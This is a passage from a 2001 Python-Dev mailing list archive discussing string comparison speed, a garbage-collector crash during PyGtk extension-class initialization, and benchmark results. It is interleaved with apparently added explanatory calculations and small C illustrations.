As far as I could trace it, most of them come from lookdict_string (at
various locations inside this function).

> > #comps:                        2949421
> > #memcmps:                       917776
> >
> > So still, ca. 30% can be decided by first byte.
> 
> Sorry, I couldn't follow this part, except noting that 917776 is about 30% of
> 2949421, in which case I would have expected you to say that 70% can be
> decided by first byte.

Oops, you are right.
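Here is Tim's correction as a worked calculation. It assumes that every comparison which does not reach memcmp is settled by the cheaper length or first-byte checks:

```latex
\frac{\#\mathrm{memcmps}}{\#\mathrm{comps}} = \frac{917776}{2949421} \approx 0.311,
\qquad 1 - 0.311 = 0.689 \approx 70\%
```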

> It's clearer that this is going to hurt sorting (& bisect etc), by
> adding yet another layer of function call to get Py_LT resolved (as
> for dict compares too, the string richcmp can't do anything to speed
> up Py_LT that string oldcmp can't do just as efficiently -- indeed,
> that's the great advantage oldcmp's "compare first character" test
> had: that *can* decide Py_LT in one byte much of the time (but
> length comparison cannot)).

So to support sorting better, I should special-case Py_LT in
string_richcompare also, to avoid the function call ?-)
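A special-cased Py_LT might look roughly like the sketch below. The `bstr` type is a hypothetical simplified byte string. The point, as Tim notes, is that a differing first byte settles "less than" immediately, whereas a length difference alone cannot. Bytes are compared as unsigned, which matches memcmp's ordering.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical byte string: length plus data. */
typedef struct {
    size_t len;
    const unsigned char *data;
} bstr;

/* Returns 1 if a < b in lexicographic unsigned-byte order. */
static int bstr_lt(const bstr *a, const bstr *b)
{
    size_t n;
    int c;

    /* First-byte fast path: decides most unequal strings at once. */
    if (a->len > 0 && b->len > 0 && a->data[0] != b->data[0])
        return a->data[0] < b->data[0];

    n = a->len < b->len ? a->len : b->len;
    c = memcmp(a->data, b->data, n);
    if (c != 0)
        return c < 0;
    return a->len < b->len;   /* common prefix: shorter sorts first */
}
```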

> Note too earlier mail about how adding a richcmp slot to strings will
> suddenly slow cmp(string1, string2) (which is the usual way to program a
> search tree, because cmp() *used* to call a string comparison routine only
> once; but after adding a richcmp slot, each cmp(string1, string2) will call
> the richcmp slot from 1 thru 3 times (data-dependent)).

Yes, that is a serious problem. Fortunately, very few calls in my
programs go to string_compare through cmp() now. But then, your
programs are different, of course...
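To see why cmp() can cost between one and three rich-comparison calls, consider the sketch below. It derives a three-way result from a rich slot by testing ==, then <, then >. It works over plain ints, and the names and probe order are assumptions chosen for illustration. A counter records how many times the slot runs.

```c
/* Hypothetical operators and a rich-compare slot over ints. */
typedef enum { R_LT, R_EQ, R_GT } rop;

static int rich_calls = 0;   /* counts invocations of the slot */

static int int_richcmp(int a, int b, rop op)
{
    rich_calls++;
    switch (op) {
    case R_LT: return a < b;
    case R_EQ: return a == b;
    case R_GT: return a > b;
    }
    return 0;
}

/* Three-way result from the rich slot, probing EQ, LT, GT in turn.
   Equal inputs cost 1 call, "less" costs 2, "greater" costs 3. */
static int cmp_via_rich(int a, int b)
{
    if (int_richcmp(a, b, R_EQ))
        return 0;
    if (int_richcmp(a, b, R_LT))
        return -1;
    if (int_richcmp(a, b, R_GT))
        return 1;
    return 0; /* no relation held; a real version needs a fallback */
}
```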

Regards,
Martin


From mal@lemburg.com  Thu May 17 07:54:37 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 08:54:37 +0200
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a
 workaround
References: <15107.29409.242342.200378@beluga.mojam.com>
Message-ID: <3B0375AD.24E039B0@lemburg.com>

skip@pobox.com wrote:
> 
> Over the past couple days I've included python-dev on various messages in an
> ongoing thread about a segmentation violation I was getting with the new
> PyGtk2 wrappers.  With some excellent assistance from the GC maestro, Neil
> Schemenauer, I finally know what's going on and I have a simple workaround
> that lets me get back to work.  Here's a summary of the problem.
> 
> When defining ExtensionClass types, you need to create and initialize a
> PyExtensionClass struct.  It looks something like so:
> 
>     PyExtensionClass PyGtkTreeSortable_Type = {
>         PyObject_HEAD_INIT(NULL)
>         0,                              /* ob_size */
>         "GtkTreeSortable",                      /* tp_name */
>         sizeof(PyPureMixinObject),      /* tp_basicsize */
>         ...
>     };
> 
> Note that the parameter to the PyObject_HEAD_INIT macro is NULL.  It would
> normally be the address of a type object (e.g. &PyType_Type).  However, Jim
> Fulton pointed out that on Windows you can't get the address of &PyType_Type
> object at compile time.  Accordingly, ExtensionClass provides a
> PyExtensionClass_Export macro whose responsibility is, in part, to set the
> ob_type field appropriately at runtime.  (I'm not sure why this Windows nit
> doesn't afflict other type declarations like PyTuple_Type.  I'm sure others
> will know why.  I just accept Jim's word as gospel and move on...)
> 
> A problem arises if the garbage collector runs while the module
> initialization function is running, but before all the ob_type fields have
> been assigned their correct values.  In this case, a one-element tuple
> representing the bases of a particular PyGtk extension class was traversed
> by the garbage collector.

I wonder how the GC collector could "see" the type object before
it has been initialized... since PyGtkTreeSortable_Type is a static
C array and not a known PyObject until you add it to some Python
dictionary as type object or use it for creating instances, it
seems strange that the GC collector can reach out for it and
get hit by the fact that it is not yet properly initialized.

Some logic in PyExtensionClass_Export() or the GTK module must
be twisted.
 
> The workaround turns out to be exceedingly simple:
> 
>     import gc
>     gc.disable()
>     import gtk
>     gc.enable()
> 
> I can handle doing that from Python code for the time being and will leave
> it up to others to decide how, if at all, ExtensionClass should be changed
> to correct the problem.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik@effbot.org  Thu May 17 08:00:20 2001
From: fredrik@effbot.org (Fredrik Lundh)
Date: Thu, 17 May 2001 09:00:20 +0200
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
References: <15107.29409.242342.200378@beluga.mojam.com>
Message-ID: <00c101c0de9f$0a6c4d10$e46940d5@hagrid>

Skip wrote:
> When defining ExtensionClass types, you need to create and initialize a
> PyExtensionClass struct.  It looks something like so:
> 
>     PyExtensionClass PyGtkTreeSortable_Type = {
>        PyObject_HEAD_INIT(NULL)
>        0, /* ob_size */
>        "GtkTreeSortable", /* tp_name */
>        sizeof(PyPureMixinObject), /* tp_basicsize */
>        ...
>     };
> 
> Note that the parameter to the PyObject_HEAD_INIT macro is NULL.  It would
> normally be the address of a type object (e.g. &PyType_Type).  However, Jim
> Fulton pointed out that on Windows you can't get the address of &PyType_Type
> object at compile time. Accordingly, ExtensionClass provides a
> PyExtensionClass_Export macro whose responsibility is, in part, to set the
> ob_type field appropriately at runtime

footnote: this is usually done in the module init function, *before*
the call to Py_InitModule.  see:

    http://www.python.org/doc/FAQ.html#3.24

if the garbage collector can run after Python calls a module's init-
function, but before that module calls back into Python, anything
can happen...
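The ordering Fredrik describes is to patch every ob_type first and only then make the types reachable. The sketch below illustrates that ordering with mock structures. `mock_type`, `expose()` and `init_module()` are hypothetical stand-ins, not CPython's real type objects or Py_InitModule.

```c
#include <stddef.h>

/* Hypothetical, heavily simplified stand-in for a type object. */
typedef struct mock_type {
    struct mock_type *ob_type;  /* NULL until fixed up at runtime */
    const char *tp_name;
} mock_type;

static mock_type Meta_Type   = { NULL, "type" };
static mock_type Widget_Type = { NULL, "Widget" }; /* like PyObject_HEAD_INIT(NULL) */

#define MAX_EXPOSED 8
static mock_type *exposed[MAX_EXPOSED];  /* what a collector could reach */
static size_t n_exposed = 0;

/* Stand-in for registering with the interpreter: after this call,
   other code (e.g. a garbage collector) may traverse the object. */
static int expose(mock_type *t)
{
    if (t->ob_type == NULL || n_exposed == MAX_EXPOSED)
        return -1;              /* refuse a half-initialized type */
    exposed[n_exposed++] = t;
    return 0;
}

/* Module init: fix up every ob_type before exposing anything. */
static int init_module(void)
{
    Meta_Type.ob_type = &Meta_Type;
    Widget_Type.ob_type = &Meta_Type;
    return expose(&Widget_Type);
}
```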

Cheers /F


From skip@pobox.com (Skip Montanaro)  Thu May 17 08:04:06 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Thu, 17 May 2001 02:04:06 -0500
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a
 workaround
In-Reply-To: <3B0375AD.24E039B0@lemburg.com>
References: <15107.29409.242342.200378@beluga.mojam.com>
 <3B0375AD.24E039B0@lemburg.com>
Message-ID: <15107.30694.131193.989215@beluga.mojam.com>

    mal> I wonder how the GC collector could "see" the type object before it
    mal> has been initialized... since PyGtkTreeSortable_Type is a static C
    mal> array and not a known PyObject until you add it to some Python
    mal> dictionary as type object or use it for creating instances, it
    mal> seems strange that the GC collector can reach out for it and get
    mal> hit by the fact that it is not yet properly initialized.

It is actually PyGtkWidget_Type that is not yet initialized when it is
placed in the bases tuple for one of its subclasses.  GC traverses that
tuple, then dives into each element.  It hits the PyGtkWidget_Type object,
whose ob_type field has not yet been initialized.  The actual object whose
bases tuple is being traversed is (in all the crashes I encountered),
GdkDragContext.  The ordering of the registration calls could perhaps be
reordered.  Currently GdkDragContext is patched up before GtkWidget, its
base class.  This code is generated by James Henstridge's wrapper code
generator, so perhaps he can maintain the necessary class hierarchy
relationships and ensure that base classes are initialized before their
subclasses.
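One way a code generator could guarantee that base classes are initialized first is to visit each class's base before the class itself, which amounts to a depth-first topological order. The sketch below uses a hypothetical class table and assumes single inheritance and an acyclic hierarchy. It deliberately lists a subclass before its base to show that the table order no longer matters.

```c
/* Hypothetical class indices, listed in the order a generator might
   emit them: a subclass before its base. */
enum { CHILD, PARENT, ROOT, SIBLING, NCLASSES };

/* base[i] is the index of class i's single base class, or -1. */
static const int base[NCLASSES] = { PARENT, ROOT, -1, PARENT };

static int done[NCLASSES];     /* 1 once class i is initialized */
static int order[NCLASSES];    /* initialization order actually used */
static int n_order = 0;

/* Initialize class i (here: just record it) after its base class. */
static void init_class(int i)
{
    if (done[i])
        return;
    if (base[i] >= 0)
        init_class(base[i]);
    done[i] = 1;
    order[n_order++] = i;
}

static void init_all(void)
{
    int i;
    for (i = 0; i < NCLASSES; i++)
        init_class(i);
}
```

With this table, init_all() records ROOT, PARENT, CHILD, SIBLING.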

Skip


From skip@pobox.com (Skip Montanaro)  Thu May 17 08:07:15 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Thu, 17 May 2001 02:07:15 -0500
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: <00c101c0de9f$0a6c4d10$e46940d5@hagrid>
References: <15107.29409.242342.200378@beluga.mojam.com>
 <00c101c0de9f$0a6c4d10$e46940d5@hagrid>
Message-ID: <15107.30883.680397.280556@beluga.mojam.com>

    Fredrik> footnote: this is usually done in the module init function,
    Fredrik> *before* the call to Py_InitModule.  see:

    Fredrik>     http://www.python.org/doc/FAQ.html#3.24

    Fredrik> if the garbage collector can run after Python calls a module's
    Fredrik> init-function, but before that module calls back into Python,
    Fredrik> anything can happen...

Thanks for pointing that out.  Py_InitModule is indeed called before the
fixup occurs.

Skip


From mal@lemburg.com  Thu May 17 08:09:38 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 09:09:38 +0200
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a
 workaround
References: <15107.29409.242342.200378@beluga.mojam.com>
 <3B0375AD.24E039B0@lemburg.com> <15107.30694.131193.989215@beluga.mojam.com>
Message-ID: <3B037932.476F475A@lemburg.com>

skip@pobox.com wrote:
> 
>     mal> I wonder how the GC collector could "see" the type object before it
>     mal> has been initialized... since PyGtkTreeSortable_Type is a static C
>     mal> array and not a known PyObject until you add it to some Python
>     mal> dictionary as type object or use it for creating instances, it
>     mal> seems strange that the GC collector can reach out for it and get
>     mal> hit by the fact that it is not yet properly initialized.
> 
> It is actually PyGtkWidget_Type that is not yet initialized when it is
> placed in the bases tuple for one of its subclasses.  GC traverses that
> tuple, then dives into each element.  It hits the PyGtkWidget_Type object,
> whose ob_type field has not yet been initialized.  The actual object whose
> bases tuple is being traversed is (in all the crashes I encountered),
> GdkDragContext.  The ordering of the registration calls could perhaps be
> reordered.  Currently GdkDragContext is patched up before GtkWidget, its
> base class.  This code is generated by James Henstridge's wrapper code
> generator, so perhaps he can maintain the necessary class hierarchy
> relationships and ensure that base classes are initialized before their
> subclasses.

Wouldn't it be easier to simply set the ob_type fields right at the
start of the initGtk() function ? This is what I do for all
my extensions and I've never seen any problems with it.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From james@daa.com.au  Thu May 17 08:18:23 2001
From: james@daa.com.au (James Henstridge)
Date: Thu, 17 May 2001 15:18:23 +0800 (WST)
Subject: [Python-Dev] Re: GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: <15107.29409.242342.200378@beluga.mojam.com>
Message-ID: <Pine.LNX.4.33.0105171515140.409-100000@quoll.daa.com.au>

On Thu, 17 May 2001 skip@pobox.com wrote:

>
> Over the past couple days I've included python-dev on various messages in an
> ongoing thread about a segmentation violation I was getting with the new
> PyGtk2 wrappers.  With some excellent assistance from the GC maestro, Neil
> Schemenauer, I finally know what's going on and I have a simple workaround
> that lets me get back to work.  Here's a summary of the problem.
>
> When defining ExtensionClass types, you need to create and initialize a
> PyExtensionClass struct.  It looks something like so:
>
>     PyExtensionClass PyGtkTreeSortable_Type = {
> 	PyObject_HEAD_INIT(NULL)
> 	0,				/* ob_size */
> 	"GtkTreeSortable",			/* tp_name */
> 	sizeof(PyPureMixinObject),	/* tp_basicsize */
> 	...
>     };
>
> Note that the parameter to the PyObject_HEAD_INIT macro is NULL.  It would
> normally be the address of a type object (e.g. &PyType_Type).  However, Jim
> Fulton pointed out that on Windows you can't get the address of &PyType_Type
> object at compile time.  Accordingly, ExtensionClass provides a
> PyExtensionClass_Export macro whose responsibility is, in part, to set the
> ob_type field appropriately at runtime.  (I'm not sure why this Windows nit
> doesn't afflict other type declarations like PyTuple_Type.  I'm sure others
> will know why.  I just accept Jim's word as gospel and move on...)

Well, for Extension Classes, PyType_Type is not correct either.  And
because ExtensionClass is loaded at runtime, we can't set the ob_type
field in the initialiser even on Unix systems.

>
> A problem arises if the garbage collector runs while the module
> initialization function is running, but before all the ob_type fields have
> been assigned their correct values.  In this case, a one-element tuple
> representing the bases of a particular PyGtk extension class was traversed
> by the garbage collector.
>
> The workaround turns out to be exceedingly simple:
>
>     import gc
>     gc.disable()
>     import gtk
>     gc.enable()
>
> I can handle doing that from Python code for the time being and will leave
> it up to others to decide how, if at all, ExtensionClass should be changed
> to correct the problem.

Thanks for debugging this problem Skip.  If we don't find a correct
solution to the problem, I can put the gc disable/enable calls inside the
gtk/__init__.py module.

James.


From mal@lemburg.com  Thu May 17 08:26:32 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 09:26:32 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com>
Message-ID: <3B037D27.E258C363@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > Since it is possible that these figures result from my specific
> > machine setup, I'd like to know what other people see on their
> > machines.
> 
> Is this the same machine where you were able to get 15% difference a few
> years ago by adding or removing an unreachable printf in ceval.c (or was that
> Vladimir)?  If so, I bet it's degenerated to random 50% difference since then
> <wink>.

That must have been Vladimir's machine... even though I do admit
that some small reordering changes do result in speedups of
up to 10% -- probably due to the compiler accidentally creating
code which the CPU's cache management likes.
 
> My Win98SE box is *astonishingly* useless for timings.  Without fail, the
> first time I run pystone after a reboot yields a result a solid 50% higher
> than the second or subsequent times I run it (yes, it's major-league *slower*
> the second time).  This is true across dozens of trials over several months,
> and across all versions of Python.

On Linux the situation is somewhat different; still I'm executing
the tests 10 times each, and for the figures I posted, I even
ran pybench twice and only took the second readings as basis.
 
> And simple little loops routinely vary in reported runtime by a factor of 3.
> I may have to dig my old Win95 box out of the packing crate <0.6 wink>.
> 
> None of that changes, of course, that the numbers you got are scary.

Sure are... but I'm not so much interested in the absolute
numbers -- it's the hot-spots which showed up that scare me:
e.g. dictionary creation seems to have suffered along the way
for some reason, function calls are even slower now than they
were previously and other important tasks such as instance
creation take a similar hit (probably as a result of the other
two).

Running the same test for 2.1 vs. 2.0 there's not much to
notice, so the important changes seem to be originating in
the move from 1.5.2 to 2.0.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From james@daa.com.au  Thu May 17 08:33:17 2001
From: james@daa.com.au (James Henstridge)
Date: Thu, 17 May 2001 15:33:17 +0800 (WST)
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem
 and a workaround
In-Reply-To: <00c101c0de9f$0a6c4d10$e46940d5@hagrid>
Message-ID: <Pine.LNX.4.33.0105171522400.409-100000@quoll.daa.com.au>

On Thu, 17 May 2001, Fredrik Lundh wrote:

> footnote: this is usually done in the module init function, *before*
> the call to Py_InitModule.  see:

The PyExtensionClass_Export() function requires a pointer to the module
dictionary so that it can add itself to the module.  Unfortunately this
requires Py_InitModule to have been called beforehand.

I guess this means that the current ExtensionClass API will need to be
modified in order to allow ExtensionClasses to be initialised before
Py_InitModule.

>
>     http://www.python.org/doc/FAQ.html#3.24
>
> if the garbage collector can run after Python calls a module's init-
> function, but before that module calls back into Python, anything
> can happen...

James.


From mwh@python.net  Thu May 17 08:43:38 2001
From: mwh@python.net (Michael Hudson)
Date: 17 May 2001 08:43:38 +0100
Subject: [Python-Dev] Performance compares
In-Reply-To: "M.-A. Lemburg"'s message of "Thu, 17 May 2001 09:26:32 +0200"
References: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com> <3B037D27.E258C363@lemburg.com>
Message-ID: <m3pud8mndh.fsf@atrus.jesus.cam.ac.uk>

"M.-A. Lemburg" <mal@lemburg.com> writes:

> Sure are... but I'm not so much interested in the absolute numbers
> -- it's the hot-spots which showed up that scare me: e.g. dictionary
> creation seems to have suffered along the way for some reason,
> function calls are even slower now than they were previously and
> other important tasks such as instance creation take a similar hit
> (probably as a result of the other two).

Have you tried fiddling with gc parameters?  If the GC does a multi
generation trawl through the heap in the middle of some test, that
might skew the numbers in unexpected ways.

Or not, of course.

Cheers,
M.

-- 
  CLiki pages can be edited by anybody at any time. Imagine the most
  fearsomely comprehensive legal disclaimer you have ever seen, and
  double it                        -- http://ww.telent.net/cliki/index


From mal@lemburg.com  Thu May 17 10:03:06 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 11:03:06 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com> <3B037D27.E258C363@lemburg.com> <m3pud8mndh.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <3B0393CA.7B0E024C@lemburg.com>

Michael Hudson wrote:
> 
> "M.-A. Lemburg" <mal@lemburg.com> writes:
> 
> > Sure are... but I'm not so much interested in the absolute numbers
> > -- it's the hot-spots which showed up that scare me: e.g. dictionary
> > creation seems to have suffered along the way for some reason,
> > functions calls are even slower now than they were previously and
> > other important tasks such a instance creation take a similar hit
> > (probably as a result of the other two).
> 
> Have you tried fiddling with gc parameters?  If the GC does a multi
> generation trawl through the heap in the middle of some test, that
> might skew the numbers in unexpected ways.
> 
> Or not, of course.

No, I haven't tried fiddling with those. I'm not sure I want
to either ;-) ... the reason is that applications won't switch
off GC for execution, and so the test is closer to real life.

Still, I'll rerun the test suite using gc.disable() and post the 
results.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Thu May 17 10:18:36 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 11:18:36 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com> <3B037D27.E258C363@lemburg.com> <m3pud8mndh.fsf@atrus.jesus.cam.ac.uk> <3B0393CA.7B0E024C@lemburg.com>
Message-ID: <3B03976C.CF47961@lemburg.com>

"M.-A. Lemburg" wrote:
> 
> Michael Hudson wrote:
> >
> > "M.-A. Lemburg" <mal@lemburg.com> writes:
> >
> > > Sure are... but I'm not so much interested in the absolute numbers
> > > -- it's the hot-spots which showed up that scare me: e.g. dictionary
> > > creation seems to have suffered along the way for some reason,
> > > function calls are even slower now than they were previously and
> > > other important tasks such as instance creation take a similar hit
> > > (probably as a result of the other two).
> >
> > Have you tried fiddling with gc parameters?  If the GC does a multi
> > generation trawl through the heap in the middle of some test, that
> > might skew the numbers in unexpected ways.
> >
> > Or not, of course.
> 
> No, I haven't tried fiddling with those. I'm not sure I want
> to either ;-) ... the reason is that applications won't switch
> off GC for execution, and so the test is closer to real life.
> 
> Still, I'll rerun the test suite using gc.disable() and post the
> results.

Turns out, the difference is not noticeable (< 1%).

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From gmcm@hypernet.com  Thu May 17 14:00:27 2001
From: gmcm@hypernet.com (Gordon McMillan)
Date: Thu, 17 May 2001 09:00:27 -0400
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: <15107.29409.242342.200378@beluga.mojam.com>
Message-ID: <3B03932B.8219.CCBF9F3F@localhost>

[Skip] 

> Note that the parameter to the PyObject_HEAD_INIT macro is NULL. 
> It would normally be the address of a type object (e.g.
> &PyType_Type).  However, Jim Fulton pointed out that on Windows
> you can't get the address of &PyType_Type object at compile time.

This is MS being passive-aggressive. If you tell MSVC the 
source is C++, it will magically find the address of 
PyType_Type at compile time, but their language lawyers 
apparently believe the C spec disallows this. Standards
conformant and incompatible -

what-MS-calls-"win-win"-ly y'rs

- Gordon


From guido@digicool.com  Thu May 17 15:04:59 2001
From: guido@digicool.com (Guido van Rossum)
Date: Thu, 17 May 2001 09:04:59 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Thu, 17 May 2001 08:12:18 +0200."
 <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de>
References: <LNBBLJKPBEHFEDALKOLCGEKMKCAA.tim.one@home.com>
 <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de>
Message-ID: <200105171405.JAA14836@cj20424-a.reston1.va.home.com>

> I'd still be in favour of giving strings a richcompare, since it
> allows us to optimize what I think is the single most frequent case:
> Py_EQ on strings.

I have always thought that eventually (but long before Py3K!) all
objects would only support rich comparisons and the __cmp__ and
tp_compare slots would become completely obsolete.  I realize I
probably haven't expressed this thought clearly, and I'm not going to
push for this to happen quickly or forcefully, but it's nevertheless
how I see things.  I expect it would allow a tremendous cleanup of the
comparison code.  It will never reach the simplicity of cmp() -- but
think of Einstein's (?) rule "things should be as simple as they can
be, but no simpler."  Clearly cmp() was too simple. :-)

Anyway, it worries me whenever I hear someone express the thought that
adding rich comparisons to a particular object type would be a bad
idea because it would slow things down.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Thu May 17 15:37:30 2001
From: guido@digicool.com (Guido van Rossum)
Date: Thu, 17 May 2001 10:37:30 -0400
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: Your message of "Thu, 17 May 2001 09:00:27 EDT."
 <3B03932B.8219.CCBF9F3F@localhost>
References: <3B03932B.8219.CCBF9F3F@localhost>
Message-ID: <200105171437.f4HEbUB09503@odiug.digicool.com>

> [Skip] 
> 
> > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. 
> > It would normally be the address of a type object (e.g.
> > &PyType_Type).  However, Jim Fulton pointed out that on Windows
> > you can't get the address of &PyType_Type object at compile time.
> 
> This is MS being passive-aggressive. If you tell MSVC the 
> source is C++, it will magically find the address of 
> PyType_Type at compile time, but their language lawyers 
> apparently believe the C spec disallows this. Standards
> conformant and incompatible -
> 
> what-MS-calls-"win-win"-ly y'rs
> 
> - Gordon

I don't think MS blames it on the language spec so much; it's probably
more that they use the spec as an excuse not to fix their
implementation.  The problem only occurs when the definition of the
symbol is in a different DLL than the reference.  This is why built-in
types like PyTuple_Type don't have this problem.  I guess for C++ they
have to do a dynamic initializer anyway, so they can make this work,
but they haven't bothered to make it work for C.

My other point is that Skip's problem is clearly a gtk bug: it
shouldn't have exposed the type before fully initializing it.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From james@daa.com.au  Thu May 17 15:48:43 2001
From: james@daa.com.au (James Henstridge)
Date: Thu, 17 May 2001 22:48:43 +0800 (WST)
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem
 and a workaround
In-Reply-To: <200105171437.f4HEbUB09503@odiug.digicool.com>
Message-ID: <Pine.LNX.4.33.0105172240320.22792-100000@james.daa.com.au>

On Thu, 17 May 2001, Guido van Rossum wrote:

> My other point is that Skip's problem is clearly a gtk bug: it
> shouldn't have exposed the type before fully initializing it.

On further investigation, it turned out that it was caused by a bug in my
code generator that caused one extension class to be initialised before
its base class (in fact, that particular extension class shouldn't have
had any base classes).  It was just the cyclic GC code triggering the bug.

It will be fixed in the next snapshot of pygtk for GTK+ 2.0

James.

-- 
Email: james@daa.com.au
WWW:   http://www.daa.com.au/~james/


From guido@digicool.com  Thu May 17 15:52:54 2001
From: guido@digicool.com (Guido van Rossum)
Date: Thu, 17 May 2001 10:52:54 -0400
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: Your message of "Thu, 17 May 2001 22:48:43 +0800."
 <Pine.LNX.4.33.0105172240320.22792-100000@james.daa.com.au>
References: <Pine.LNX.4.33.0105172240320.22792-100000@james.daa.com.au>
Message-ID: <200105171452.f4HEqse09691@odiug.digicool.com>

> On further investigation, it turned out that it was caused by a bug in my
> code generator that caused one extension class to be initialised before
> its base class (in fact, that particular extension class shouldn't have
> had any base classes).  It was just the cyclic GC code triggering the bug.
> 
> It will be fixed in the next snapshot of pygtk for GTK+ 2.0

Excellent news, James!  I love the open source process!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From barry@digicool.com  Thu May 17 16:04:50 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Thu, 17 May 2001 11:04:50 -0400
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
References: <Pine.LNX.4.33.0105172240320.22792-100000@james.daa.com.au>
 <200105171452.f4HEqse09691@odiug.digicool.com>
Message-ID: <15107.59538.421007.37251@anthem.wooz.org>

>>>>> "GvR" == Guido van Rossum <guido@digicool.com> writes:

    GvR> Excellent news, James!  I love the open source process!

No kidding!

http://perens.com/Articles/StandTogether.html

:)


From Barrett@stsci.edu  Thu May 17 15:56:49 2001
From: Barrett@stsci.edu (Paul Barrett)
Date: Thu, 17 May 2001 10:56:49 -0400
Subject: [Python-Dev] mmap module
Message-ID: <3B03E6B1.A19F6594@STScI.Edu>

In the CVS log of the mmapmodule.c, Tim Peters says:

"The code really needs to be rethought from scratch (not by me, though
...)."

Well, I might be the person to do the rethinking, but I'd first like
to know what Tim has in mind.  I've been playing around with this
module lately and tend to agree that some enhancements could be made,
particularly to prevent "bus errors" and "segmentation faults".  The
ability to have offsets into a file that are not multiples of the
system pagesize would also be nice.

I'd be willing to submit a PEP on a new mmapmodule, once I know what
others would like.

 -- Paul

-- 
Paul Barrett, PhD      Space Telescope Science Institute
Phone: 410-338-4475    ESS/Science Software Group
FAX:   410-338-4767    Baltimore, MD 21218


From tim.one@home.com  Thu May 17 17:02:38 2001
From: tim.one@home.com (Tim Peters)
Date: Thu, 17 May 2001 12:02:38 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105171405.JAA14836@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIENEKCAA.tim.one@home.com>

[Guido]
> I have always thought that eventually (but long before Py3K!) all
> objects would only support rich comparisons and the __cmp__ and
> tp_compare slots would become completely obsolete.  I realize I
> probably haven't expressed this thought clearly, and I'm not going to
> push for this to happen quickly or forcefully, but it's nevertheless
> how I see things.  I expect it would allow a tremendous cleanup of the
> comparison code.  It will never reach the simplicity of cmp() -- but
> think of Einstein's (?) rule "things should be as simple as they can
> be, but no simpler."  Clearly cmp() was too simple. :-)
>
> Anyway, it worries me whenever I hear someone express the thought that
> adding rich comparisons to a particular object type would be a bad
> idea because it would slow things down.

At the moment, "almost all" comparisons in the dynamic sense have no need of
richcmps, so clearly "Clearly cmp() was too simple. :-)" was too simple
<wink>.  For now richcmps are a tail-wagging-the-dog phenomenon, or more like
the tail growing 10 pounds of dense matted hair, making the once-frisky puppy
slow to a crawl because its butt is scraping the ground <wink>.

Martin and I can resolve our differences wrt strings via getting rid of old
strcmp entirely.  Do you like the implications?

1. Code using cmp(string1, string2) will clearly run significantly
   slower, calling string comparison 1 (when == obtains), 2 (when <
   obtains), or 3 (when > obtains) times instead of always once only.
   Since == is the least likely outcome when using cmp() on strings
   (you can conclude that by instrumenting Python, or by common
   sense <0.5 wink>), the number of string compare calls more than
   doubles in practice for string cmp()-slinging programs (which
   includes existing well-written tree-based lookup schemes).

2. String dictionary lookup will, unlike the general non-dict case
   Martin instrumented, never pass the new "are the pointers the
   same?" richcmp Py_EQ test (because dict lookup already makes that
   test inline).  So if old strcmp goes away, dict lookups that
   have to resort to strcmp will start paying for hopeless tests.
   OTOH, the "pointers equal?" test looks of dubious value for the
   non-dict string case anyway (where it succeeded only 1 in 20
   times).
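A minimal sketch of point 1, assuming each rich comparison performs its own full strcmp(). The helper names and the call counter are hypothetical and are not CPython's. Emulating a 3-way cmp() by trying ==, then <, then > runs the underlying comparison 1, 2 or 3 times, while the old single-call path always runs it once.

```c
#include <assert.h>
#include <string.h>

/* Counts how many times an underlying string comparison runs. */
static int compare_calls = 0;

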